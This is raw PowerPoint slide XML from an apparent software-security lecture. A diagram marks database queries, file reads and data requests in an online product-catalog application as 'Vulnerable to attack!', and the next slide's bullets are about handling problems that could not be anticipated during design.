                  <a:off x="4872929" y="3129933"/>
                  <a:ext cx="785538" cy="414350"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Database</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Queries</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="42" name="Rectangle 41"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5108316" y="3639396"/>
                  <a:ext cx="715401" cy="414350"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Product</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="ctr" defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Data</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="43" name="Arc 42"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="780408">
                  <a:off x="3968412" y="1649203"/>
                  <a:ext cx="834670" cy="1145743"/>
                </a:xfrm>
                <a:prstGeom prst="arc">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val 17646373"/>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44" name="Arc 43"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="10800000">
                  <a:off x="4106675" y="1883138"/>
                  <a:ext cx="834670" cy="1145743"/>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45" name="Rectangle 44"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3330715" y="2107214"/>
                  <a:ext cx="790933" cy="414350"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>File Read</a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Requests</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Rectangle 45"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4792116" y="1892000"/>
                  <a:ext cx="755866" cy="284866"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>File Data</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Arc 46"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="10800000">
                  <a:off x="6903774" y="2049957"/>
                  <a:ext cx="834670" cy="1677515"/>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48" name="Rectangle 47"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6134892" y="2578971"/>
                  <a:ext cx="790933" cy="414350"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Data</a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Requests</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="49" name="Rectangle 48"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7321107" y="2104525"/>
                  <a:ext cx="715401" cy="414350"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Product</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr defTabSz="914400"/>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                      <a:latin typeface="Arial"/>
                    </a:rPr>
                    <a:t>Data</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="50" name="Arc 49"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6512306" y="1335033"/>
                  <a:ext cx="834670" cy="1975248"/>
                </a:xfrm>
                <a:prstGeom prst="arc">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val 19732965"/>
                    <a:gd name="adj2" fmla="val 4413606"/>
                  </a:avLst>
                </a:prstGeom>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:prstDash val="soli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sp>
              <p:nvSpPr>
                <p:cNvPr id="51" name="Arc 50"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="5814151" y="1148312"/>
                  <a:ext cx="2168673" cy="4603544"/>
                </a:xfrm>
                <a:prstGeom prst="arc">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val 16858567"/>
                    <a:gd name="adj2" fmla="val 4703389"/>
                  </a:avLst>
                </a:prstGeom>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="01A1DD"/>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dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="65" name="Rectangle 64"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6013542" y="2698397"/>
                <a:ext cx="1149536" cy="138859"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="500" b="1" kern="0" dirty="0">
                    <a:latin typeface="Arial"/>
                  </a:rPr>
                  <a:t>Present product catalog and take orders</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="500" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2048" name="Freeform: Shape 2047"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2293479" y="1333824"/>
              <a:ext cx="1238250" cy="294938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1238250"/>
                <a:gd name="connsiteY0" fmla="*/ 47288 h 294938"/>
                <a:gd name="connsiteX1" fmla="*/ 771525 w 1238250"/>
                <a:gd name="connsiteY1" fmla="*/ 18713 h 294938"/>
                <a:gd name="connsiteX2" fmla="*/ 1238250 w 1238250"/>
                <a:gd name="connsiteY2" fmla="*/ 294938 h 294938"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1238250" h="294938">
                  <a:moveTo>
                    <a:pt x="0" y="47288"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="282575" y="12363"/>
                    <a:pt x="565150" y="-22562"/>
                    <a:pt x="771525" y="18713"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="977900" y="59988"/>
                    <a:pt x="1108075" y="177463"/>
                    <a:pt x="1238250" y="294938"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="15875" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:tailEnd type="stealth"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Star: 10 Points 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21045130">
              <a:off x="1795362" y="1109168"/>
              <a:ext cx="838200" cy="672345"/>
            </a:xfrm>
            <a:prstGeom prst="star10">
              <a:avLst>
                <a:gd name="adj" fmla="val 28366"/>
                <a:gd name="hf" fmla="val 105146"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="914400"/>
              <a:r>
                <a:rPr lang="en-US" sz="600" b="1" kern="0" dirty="0">
                  <a:latin typeface="Arial"/>
                </a:rPr>
                <a:t>Vulnerable to attack!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="Freeform: Shape 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="19358878" flipH="1" flipV="1">
              <a:off x="6348347" y="1806845"/>
              <a:ext cx="573588" cy="246177"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1238250"/>
                <a:gd name="connsiteY0" fmla="*/ 47288 h 294938"/>
                <a:gd name="connsiteX1" fmla="*/ 771525 w 1238250"/>
                <a:gd name="connsiteY1" fmla="*/ 18713 h 294938"/>
                <a:gd name="connsiteX2" fmla="*/ 1238250 w 1238250"/>
                <a:gd name="connsiteY2" fmla="*/ 294938 h 294938"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1238250" h="294938">
                  <a:moveTo>
                    <a:pt x="0" y="47288"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="282575" y="12363"/>
                    <a:pt x="565150" y="-22562"/>
                    <a:pt x="771525" y="18713"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="977900" y="59988"/>
                    <a:pt x="1108075" y="177463"/>
                    <a:pt x="1238250" y="294938"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="15875" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:tailEnd type="stealth"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="Star: 10 Points 71"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21045130">
              <a:off x="6723982" y="1376505"/>
              <a:ext cx="838200" cy="672345"/>
            </a:xfrm>
            <a:prstGeom prst="star10">
              <a:avLst>
                <a:gd name="adj" fmla="val 28366"/>
                <a:gd name="hf" fmla="val 105146"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="914400"/>
              <a:r>
                <a:rPr lang="en-US" sz="600" b="1" kern="0" dirty="0">
                  <a:latin typeface="Arial"/>
                </a:rPr>
                <a:t>Vulnerable to attack!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Freeform: Shape 72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="3997856" flipH="1" flipV="1">
              <a:off x="4869451" y="2776931"/>
              <a:ext cx="573588" cy="246177"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1238250"/>
                <a:gd name="connsiteY0" fmla="*/ 47288 h 294938"/>
                <a:gd name="connsiteX1" fmla="*/ 771525 w 1238250"/>
                <a:gd name="connsiteY1" fmla="*/ 18713 h 294938"/>
                <a:gd name="connsiteX2" fmla="*/ 1238250 w 1238250"/>
                <a:gd name="connsiteY2" fmla="*/ 294938 h 294938"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1238250" h="294938">
                  <a:moveTo>
                    <a:pt x="0" y="47288"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="282575" y="12363"/>
                    <a:pt x="565150" y="-22562"/>
                    <a:pt x="771525" y="18713"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="977900" y="59988"/>
                    <a:pt x="1108075" y="177463"/>
                    <a:pt x="1238250" y="294938"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="15875" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:tailEnd type="stealth"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="Star: 10 Points 73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21045130">
              <a:off x="4856587" y="3023541"/>
              <a:ext cx="838200" cy="672345"/>
            </a:xfrm>
            <a:prstGeom prst="star10">
              <a:avLst>
                <a:gd name="adj" fmla="val 28366"/>
                <a:gd name="hf" fmla="val 105146"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="914400"/>
              <a:r>
                <a:rPr lang="en-US" sz="600" b="1" kern="0" dirty="0">
                  <a:latin typeface="Arial"/>
                </a:rPr>
                <a:t>Vulnerable to attack!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="Freeform: Shape 74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="6567221" flipH="1">
              <a:off x="3662126" y="2976798"/>
              <a:ext cx="573588" cy="214227"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1238250"/>
                <a:gd name="connsiteY0" fmla="*/ 47288 h 294938"/>
                <a:gd name="connsiteX1" fmla="*/ 771525 w 1238250"/>
                <a:gd name="connsiteY1" fmla="*/ 18713 h 294938"/>
                <a:gd name="connsiteX2" fmla="*/ 1238250 w 1238250"/>
                <a:gd name="connsiteY2" fmla="*/ 294938 h 294938"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1238250" h="294938">
                  <a:moveTo>
                    <a:pt x="0" y="47288"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="282575" y="12363"/>
                    <a:pt x="565150" y="-22562"/>
                    <a:pt x="771525" y="18713"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="977900" y="59988"/>
                    <a:pt x="1108075" y="177463"/>
                    <a:pt x="1238250" y="294938"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="15875" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:tailEnd type="stealth"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="Star: 10 Points 75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21045130">
              <a:off x="3341400" y="3108846"/>
              <a:ext cx="838200" cy="672345"/>
            </a:xfrm>
            <a:prstGeom prst="star10">
              <a:avLst>
                <a:gd name="adj" fmla="val 28366"/>
                <a:gd name="hf" fmla="val 105146"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="914400"/>
              <a:r>
                <a:rPr lang="en-US" sz="600" b="1" kern="0" dirty="0">
                  <a:latin typeface="Arial"/>
                </a:rPr>
                <a:t>Vulnerable to attack!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Freeform: Shape 76"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="19467805" flipH="1">
              <a:off x="5134981" y="1335713"/>
              <a:ext cx="420063" cy="164131"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1238250"/>
                <a:gd name="connsiteY0" fmla="*/ 47288 h 294938"/>
                <a:gd name="connsiteX1" fmla="*/ 771525 w 1238250"/>
                <a:gd name="connsiteY1" fmla="*/ 18713 h 294938"/>
                <a:gd name="connsiteX2" fmla="*/ 1238250 w 1238250"/>
                <a:gd name="connsiteY2" fmla="*/ 294938 h 294938"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1238250" h="294938">
                  <a:moveTo>
                    <a:pt x="0" y="47288"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="282575" y="12363"/>
                    <a:pt x="565150" y="-22562"/>
                    <a:pt x="771525" y="18713"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="977900" y="59988"/>
                    <a:pt x="1108075" y="177463"/>
                    <a:pt x="1238250" y="294938"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="15875" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:tailEnd type="stealth"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Star: 10 Points 77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21045130">
              <a:off x="5252976" y="967711"/>
              <a:ext cx="838200" cy="672345"/>
            </a:xfrm>
            <a:prstGeom prst="star10">
              <a:avLst>
                <a:gd name="adj" fmla="val 28366"/>
                <a:gd name="hf" fmla="val 105146"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="914400"/>
              <a:r>
                <a:rPr lang="en-US" sz="600" b="1" kern="0" dirty="0">
                  <a:latin typeface="Arial"/>
                </a:rPr>
                <a:t>Vulnerable to attack!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="482109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83809" y="2474253"/>
            <a:ext cx="4604458" cy="4133678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09A9D98A-D19A-4388-81C6-933C5B07EB18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99A82BB5-857B-4959-93F5-9E547B573D5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="7735275" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deal with issues that can’t be planned for or anticipated during design phase.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address problems as they arise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
